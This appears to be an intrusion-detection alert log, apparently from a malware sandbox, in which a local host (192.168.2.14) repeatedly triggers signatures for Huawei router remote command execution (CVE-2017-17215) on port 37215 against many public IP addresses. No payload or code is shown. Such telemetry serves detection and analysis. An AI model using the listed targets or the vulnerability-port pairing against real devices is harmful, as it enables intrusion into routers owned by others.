                                                    07/10/24-08:27:24.920264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829237215192.168.2.1441.67.41.9
                                                    07/10/24-08:27:31.538076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149037215192.168.2.14197.37.219.194
                                                    07/10/24-08:27:32.622177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289837215192.168.2.1441.215.50.123
                                                    07/10/24-08:26:13.754443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470437215192.168.2.1458.216.141.54
                                                    07/10/24-08:26:59.780111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499437215192.168.2.14197.38.73.83
                                                    07/10/24-08:27:24.928816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351437215192.168.2.14192.89.31.247
                                                    07/10/24-08:27:33.768377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.14197.82.198.242
                                                    07/10/24-08:26:28.825249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981837215192.168.2.1460.196.5.192
                                                    07/10/24-08:27:13.894673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457037215192.168.2.1441.234.15.198
                                                    07/10/24-08:26:49.830587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.14157.219.159.8
                                                    07/10/24-08:26:33.247887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638237215192.168.2.1441.205.210.157
                                                    07/10/24-08:26:57.658066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674837215192.168.2.1413.140.80.105
                                                    07/10/24-08:26:48.016890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942837215192.168.2.14156.213.128.178
                                                    07/10/24-08:26:33.220659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.14166.84.209.78
                                                    07/10/24-08:27:14.839974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668237215192.168.2.1441.107.69.35
                                                    07/10/24-08:27:27.158777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507437215192.168.2.1441.229.171.252
                                                    07/10/24-08:27:02.982637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4819437215192.168.2.1441.221.134.100
                                                    07/10/24-08:26:42.373871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309037215192.168.2.14197.64.45.99
                                                    07/10/24-08:26:43.806576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151237215192.168.2.1420.203.74.142
                                                    07/10/24-08:26:59.604052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851037215192.168.2.14144.100.93.156
                                                    07/10/24-08:26:34.242772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888637215192.168.2.1441.212.214.9
                                                    07/10/24-08:27:34.131322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480037215192.168.2.14197.218.155.36
                                                    07/10/24-08:27:14.893689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386637215192.168.2.14157.147.16.139
                                                    07/10/24-08:26:11.628509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254637215192.168.2.1441.74.79.224
                                                    07/10/24-08:27:31.530342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079037215192.168.2.1441.176.93.52
                                                    07/10/24-08:26:29.885713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854037215192.168.2.14197.8.158.75
                                                    07/10/24-08:27:05.198255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244637215192.168.2.14139.110.118.39
                                                    07/10/24-08:26:41.615141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351637215192.168.2.1491.191.185.152
                                                    07/10/24-08:26:38.627693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911837215192.168.2.14197.120.213.207
                                                    07/10/24-08:27:19.324318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071837215192.168.2.1441.197.45.20
                                                    07/10/24-08:26:36.358828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729437215192.168.2.1441.174.34.96
                                                    07/10/24-08:26:55.277913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331237215192.168.2.14197.210.49.186
                                                    07/10/24-08:27:11.566037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463837215192.168.2.1437.244.191.224
                                                    07/10/24-08:26:38.608580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.1441.86.163.204
                                                    07/10/24-08:26:43.872664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473437215192.168.2.1441.113.236.131
                                                    07/10/24-08:26:25.453696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498037215192.168.2.1441.240.250.153
                                                    07/10/24-08:27:16.985379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304837215192.168.2.1441.35.193.65
                                                    07/10/24-08:26:42.342192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482037215192.168.2.1424.124.1.53
                                                    07/10/24-08:26:33.206981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887437215192.168.2.1436.235.134.109
                                                    07/10/24-08:26:26.527286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197437215192.168.2.14157.122.159.182
                                                    07/10/24-08:27:30.443855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569837215192.168.2.14157.20.104.50
                                                    07/10/24-08:27:33.915892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974037215192.168.2.14157.161.161.216
                                                    07/10/24-08:27:33.865886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036837215192.168.2.144.156.176.92
                                                    07/10/24-08:26:18.021892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279637215192.168.2.1441.52.11.100
                                                    07/10/24-08:27:07.379672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668237215192.168.2.14197.156.160.220
                                                    07/10/24-08:26:52.037168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319237215192.168.2.14197.102.167.151
                                                    07/10/24-08:26:55.385824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934837215192.168.2.14132.91.11.188
                                                    07/10/24-08:26:36.392573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604837215192.168.2.1441.3.50.97
                                                    07/10/24-08:26:59.644230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054037215192.168.2.14197.9.144.99
                                                    07/10/24-08:26:22.294435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750237215192.168.2.14157.50.173.87
                                                    07/10/24-08:26:43.756816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891437215192.168.2.14157.120.136.189
                                                    07/10/24-08:26:28.834790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106837215192.168.2.14197.42.250.251
                                                    07/10/24-08:27:08.334511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429837215192.168.2.14197.222.189.12
                                                    07/10/24-08:26:22.278115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793437215192.168.2.149.199.128.37
                                                    07/10/24-08:26:59.714271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948037215192.168.2.14197.70.61.31
                                                    07/10/24-08:26:15.875738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370837215192.168.2.14157.55.127.70
                                                    07/10/24-08:27:10.629470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.14157.49.65.232
                                                    07/10/24-08:27:24.985108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429037215192.168.2.14144.209.245.99
                                                    07/10/24-08:27:28.082324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530837215192.168.2.1479.38.190.190
                                                    07/10/24-08:26:57.603262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991637215192.168.2.14171.177.76.162
                                                    07/10/24-08:26:59.522844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898837215192.168.2.14197.131.89.224
                                                    07/10/24-08:26:11.131677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487437215192.168.2.14171.128.195.137
                                                    07/10/24-08:27:08.427653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807037215192.168.2.14197.240.181.217
                                                    07/10/24-08:27:02.834803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320637215192.168.2.14154.41.83.14
                                                    07/10/24-08:27:13.879424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160437215192.168.2.14197.24.218.129
                                                    07/10/24-08:27:19.315595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886037215192.168.2.1441.112.190.173
                                                    07/10/24-08:26:11.595600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952237215192.168.2.14157.45.111.206
                                                    07/10/24-08:26:55.462338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470237215192.168.2.1488.34.30.230
                                                    07/10/24-08:27:32.558731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030437215192.168.2.14157.153.255.51
                                                    07/10/24-08:26:23.308170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944037215192.168.2.1441.62.201.189
                                                    07/10/24-08:26:38.525965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425637215192.168.2.14207.18.239.36
                                                    07/10/24-08:27:17.096498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745837215192.168.2.1441.231.25.94
                                                    07/10/24-08:26:42.419943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441237215192.168.2.1441.121.163.10
                                                    07/10/24-08:26:41.529373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716437215192.168.2.1441.211.158.168
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862237215192.168.2.1441.80.105.233
                                                    07/10/24-08:26:33.231407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204037215192.168.2.1483.192.244.86
                                                    07/10/24-08:27:14.754688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493637215192.168.2.1441.97.0.194
                                                    07/10/24-08:27:23.895746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686437215192.168.2.14123.33.215.237
                                                    07/10/24-08:27:14.900455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803037215192.168.2.14197.30.93.5
                                                    07/10/24-08:27:22.936738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3986837215192.168.2.14211.185.86.45
                                                    07/10/24-08:26:20.137908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985837215192.168.2.1441.221.235.198
                                                    07/10/24-08:26:26.527286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.1441.28.116.215
                                                    07/10/24-08:26:45.647337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293437215192.168.2.14169.193.154.177
                                                    07/10/24-08:26:59.856754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546837215192.168.2.14157.223.251.205
                                                    07/10/24-08:27:22.866153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734637215192.168.2.14197.115.63.104
                                                    07/10/24-08:27:14.836980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3522637215192.168.2.14157.49.25.211
                                                    07/10/24-08:26:28.927813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660237215192.168.2.14197.153.56.150
                                                    07/10/24-08:27:20.501518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284037215192.168.2.14157.51.95.13
                                                    07/10/24-08:27:08.323465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408837215192.168.2.1441.71.198.110
                                                    07/10/24-08:27:28.124721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659237215192.168.2.14197.205.134.123
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656437215192.168.2.14105.56.33.82
                                                    07/10/24-08:26:52.032840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3976037215192.168.2.1441.182.112.137
                                                    07/10/24-08:27:17.019850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575037215192.168.2.14166.225.11.41
                                                    07/10/24-08:26:51.979400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720437215192.168.2.14197.209.168.218
                                                    07/10/24-08:27:05.217430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811637215192.168.2.14197.206.193.219
                                                    07/10/24-08:26:13.766150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322437215192.168.2.1441.152.177.189
                                                    07/10/24-08:27:23.866031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899037215192.168.2.14197.19.134.249
                                                    07/10/24-08:27:19.339416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272637215192.168.2.1460.120.242.107
                                                    07/10/24-08:27:22.810848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716837215192.168.2.14157.230.197.101
                                                    07/10/24-08:26:43.686036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996637215192.168.2.14197.160.180.13
                                                    07/10/24-08:27:28.165302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718037215192.168.2.14219.36.91.201
                                                    07/10/24-08:26:14.829597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727837215192.168.2.1450.243.166.249
                                                    07/10/24-08:26:55.360027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216837215192.168.2.14197.235.70.240
                                                    07/10/24-08:26:15.835442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549237215192.168.2.1441.21.65.30
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816237215192.168.2.14157.55.70.121
                                                    07/10/24-08:27:07.374713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764437215192.168.2.14157.201.85.124
                                                    07/10/24-08:27:10.547644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678437215192.168.2.14157.229.215.169
                                                    07/10/24-08:27:14.815899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481037215192.168.2.14157.182.124.156
                                                    07/10/24-08:27:27.159132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193837215192.168.2.14213.175.147.99
                                                    07/10/24-08:27:30.428710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627237215192.168.2.14157.213.41.33
                                                    07/10/24-08:26:26.591282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578637215192.168.2.14157.212.80.244
                                                    07/10/24-08:26:34.231574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758237215192.168.2.14118.201.205.229
                                                    07/10/24-08:27:17.063694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355237215192.168.2.14111.214.124.126
                                                    07/10/24-08:27:27.047599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.1465.92.237.52
                                                    07/10/24-08:26:23.343986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651437215192.168.2.14157.177.245.153
                                                    07/10/24-08:26:26.531286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118037215192.168.2.14205.51.171.42
                                                    07/10/24-08:26:28.648108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486037215192.168.2.14139.246.44.60
                                                    07/10/24-08:26:43.704112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.1441.195.72.229
                                                    07/10/24-08:26:11.541811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939837215192.168.2.14111.212.211.64
                                                    07/10/24-08:26:28.739373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284637215192.168.2.14142.140.229.32
                                                    07/10/24-08:27:08.397659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782237215192.168.2.14157.166.1.185
                                                    07/10/24-08:27:08.412825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361437215192.168.2.14197.97.91.65
                                                    07/10/24-08:26:51.939939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880837215192.168.2.14157.249.53.64
                                                    07/10/24-08:26:55.312291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532237215192.168.2.1414.74.189.103
                                                    07/10/24-08:26:41.617350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601237215192.168.2.14197.247.235.90
                                                    07/10/24-08:26:43.615736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790037215192.168.2.14197.154.193.55
                                                    07/10/24-08:27:24.872806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644237215192.168.2.14197.143.81.215
                                                    07/10/24-08:26:18.019424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917437215192.168.2.1425.136.100.142
                                                    07/10/24-08:26:28.768053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716437215192.168.2.14197.7.132.161
                                                    07/10/24-08:26:26.601174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14197.29.101.120
                                                    07/10/24-08:26:28.929759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321437215192.168.2.1441.242.62.222
                                                    07/10/24-08:27:23.914587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264637215192.168.2.14157.243.209.135
                                                    07/10/24-08:27:22.838932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885037215192.168.2.1432.139.211.9
                                                    07/10/24-08:27:08.446107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417437215192.168.2.14197.132.221.106
                                                    07/10/24-08:26:57.662908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583837215192.168.2.14197.33.64.244
                                                    07/10/24-08:26:59.580773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602437215192.168.2.14197.168.76.22
                                                    07/10/24-08:26:57.665893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600437215192.168.2.14197.247.187.203
                                                    07/10/24-08:26:14.759956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356037215192.168.2.1441.168.111.237
                                                    07/10/24-08:26:38.618161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488037215192.168.2.1443.158.37.144
                                                    07/10/24-08:26:43.677114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759837215192.168.2.1441.152.89.250
                                                    07/10/24-08:27:30.482034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917637215192.168.2.142.52.194.81
                                                    07/10/24-08:26:20.118074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948837215192.168.2.14156.232.84.203
                                                    07/10/24-08:27:22.856924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405037215192.168.2.14197.222.107.171
                                                    07/10/24-08:26:11.590695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751837215192.168.2.14177.47.141.82
                                                    07/10/24-08:26:25.493700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721637215192.168.2.1441.40.175.201
                                                    07/10/24-08:26:38.555542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805237215192.168.2.14157.104.84.95
                                                    07/10/24-08:27:31.448352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224237215192.168.2.14102.72.6.225
                                                    07/10/24-08:27:14.875328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627837215192.168.2.14157.195.217.2
                                                    07/10/24-08:27:13.868751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077237215192.168.2.14157.52.97.115
                                                    07/10/24-08:27:33.769630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352637215192.168.2.14157.168.243.102
                                                    07/10/24-08:26:41.455347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434437215192.168.2.14157.235.187.166
                                                    07/10/24-08:27:27.133887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.14157.84.208.119
                                                    07/10/24-08:26:28.777309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478637215192.168.2.14197.13.2.33
                                                    07/10/24-08:26:20.156560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324437215192.168.2.14123.58.186.236
                                                    07/10/24-08:26:11.144778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057637215192.168.2.1441.189.126.251
                                                    07/10/24-08:26:55.436207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664437215192.168.2.1441.67.187.34
                                                    07/10/24-08:27:02.811606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270837215192.168.2.1441.239.129.129
                                                    07/10/24-08:27:24.976669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105837215192.168.2.14157.1.91.91
                                                    07/10/24-08:27:27.121135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704037215192.168.2.1441.239.250.252
                                                    07/10/24-08:27:32.549602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14157.191.234.129
                                                    07/10/24-08:27:02.872707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362037215192.168.2.1417.20.149.15
                                                    07/10/24-08:26:15.881415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016637215192.168.2.1441.28.33.25
                                                    07/10/24-08:26:43.857526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079037215192.168.2.14197.29.225.91
                                                    07/10/24-08:26:59.646410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792437215192.168.2.14197.45.106.116
                                                    07/10/24-08:26:55.450781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964237215192.168.2.1441.212.81.99
                                                    07/10/24-08:27:03.034079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963637215192.168.2.14197.19.44.211
                                                    07/10/24-08:26:23.320743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363037215192.168.2.14197.45.12.6
                                                    07/10/24-08:27:30.546490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056637215192.168.2.1447.60.199.255
                                                    07/10/24-08:27:07.268531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.14208.173.240.6
                                                    07/10/24-08:26:33.252129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749437215192.168.2.1427.217.254.39
                                                    07/10/24-08:27:33.868088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962037215192.168.2.14134.214.153.75
                                                    07/10/24-08:26:22.300019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773037215192.168.2.1441.79.254.206
                                                    07/10/24-08:26:43.923272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375837215192.168.2.14157.102.45.244
                                                    07/10/24-08:27:07.401020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515637215192.168.2.1441.188.56.29
                                                    07/10/24-08:27:14.003355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368437215192.168.2.14197.72.85.165
                                                    07/10/24-08:27:19.246570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491837215192.168.2.14157.158.105.105
                                                    07/10/24-08:26:52.028986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712037215192.168.2.14101.23.133.123
                                                    07/10/24-08:26:43.813541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834837215192.168.2.1441.194.45.185
                                                    07/10/24-08:26:36.383866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871037215192.168.2.14197.208.53.115
                                                    07/10/24-08:26:25.514524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.79.30.176
                                                    07/10/24-08:27:30.433445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936837215192.168.2.14157.26.252.124
                                                    07/10/24-08:26:47.908603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515837215192.168.2.14197.250.195.172
                                                    07/10/24-08:27:24.986778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320237215192.168.2.14157.244.141.221
                                                    07/10/24-08:27:34.117874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557237215192.168.2.14217.185.191.73
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064837215192.168.2.142.190.53.103
                                                    07/10/24-08:27:13.850928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179837215192.168.2.14207.179.139.38
